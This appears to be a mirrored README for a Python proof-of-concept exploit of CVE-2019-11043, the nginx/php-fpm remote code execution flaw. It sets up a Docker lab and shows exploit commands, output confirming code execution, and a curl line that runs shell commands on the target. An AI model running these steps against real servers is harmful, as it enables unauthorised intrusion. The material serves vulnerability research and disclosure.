CVE-2019-11043

(PoC) Python version of CVE-2019-11043 exploit by neex

Project README

PoC CVE-2019-11043

A Python version of the CVE-2019-11043 exploit by neex: https://github.com/neex/phuip-fpizdam
This PoC is still a draft; please use the exploit written by @neex instead.
Vulnerability Analysis: https://paper.seebug.org/1064/

PoC Setup

Just run docker compose to bring up nginx and php-fpm:

# docker-compose up -d
Creating network "cve-2019-11043-git_app_net" with driver "bridge"
Creating php   ... done
Creating nginx ... done

If you wish to read the php-fpm logs, run:

docker logs --tail 10 --follow php

Exploit

# python3 exploit.py --url http://localhost/index.php
[*] QSL candidate: 1752, 1757, 1762
[*] Target seems vulnerable: PHPSESSID=05b156ea034b903de6624f09c513541c; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://localhost/index.php?a=bin/ls+/

If you want to check the vulnerability only, skipping the exploit:

python3 exploit.py --url http://localhost/index.php --skip-rce

You can try to kill the php-fpm process and reset all injected PHP settings with --reset:

python3 exploit.py --url http://localhost/index.php --reset

Video PoC

https://twitter.com/Menin_TheMiddle/status/1188776386569355265

Open Source Agenda is not affiliated with the "CVE 2019 11043" project. README source: theMiddleBlue/CVE-2019-11043
Stars: 144, Open Issues: 1, Last Commit: 4 years ago